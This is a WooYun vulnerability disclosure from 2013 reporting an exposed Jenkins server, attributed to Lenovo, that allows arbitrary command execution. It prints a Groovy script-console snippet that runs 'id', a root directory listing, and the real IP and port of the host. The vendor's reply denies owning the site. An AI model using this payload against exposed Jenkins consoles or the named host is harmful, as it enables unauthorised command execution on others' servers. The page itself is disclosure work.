当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-047404

漏洞标题:联想某站点因服务运维不当可执行命令

相关厂商:联想

漏洞作者: he2des

提交时间:2013-12-30 14:44

修复时间:2013-12-31 10:34

公开时间:2013-12-31 10:34

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-30: 细节已通知厂商并且等待厂商处理中
2013-12-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

联想某站点因服务运维不当可执行命令

详细说明:

经上面检测,于是C段了一下无意发现了联想某服务器也使用jenkins:

http://59.61.88.234:8080/


QQ图片20131230133140.jpg

漏洞证明:

支持执行任意系统命令哦:

try{ 
    Process p="id".execute()  
    println "${p.text}"
     } catch(Exception e){ 
}


QQ图片20131230133337.jpg


total 248
drwxr-xr-x   4 root root  4096 Oct 10  2011 amd64-mingw32msvc
drwxr-xr-x   2 root root 69632 Dec  6 13:23 bin
drwxr-xr-x   2 root root  4096 Jan 21  2011 games
drwxr-xr-x   5 root root  4096 Oct 10  2011 i586-mingw32msvc
drwxr-xr-x  78 root root 20480 Dec 11 15:12 include
drwxr-xr-x 112 root root 69632 Dec  6 13:23 lib
drwxr-xr-x   4 root root 36864 Dec  6 11:42 lib32
drwxr-xr-x   3 root root  4096 Oct 10  2011 libexec
drwxr-xr-x  11 root root  4096 Feb 16  2012 local
drwxr-xr-x   2 root root 12288 Dec  6 11:46 sbin
drwxr-xr-x 193 root root 12288 Dec 11 15:11 share
drwxrwsr-x   6 root src   4096 Dec  6 13:23 src

修复方案:

如果没有必要,这个站点就不要对外开放了哦;

版权声明:转载请注明来源 he2des@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-31 10:34

厂商回复:

此站点不属于联想

最新状态:

暂无

漏洞评价:

评论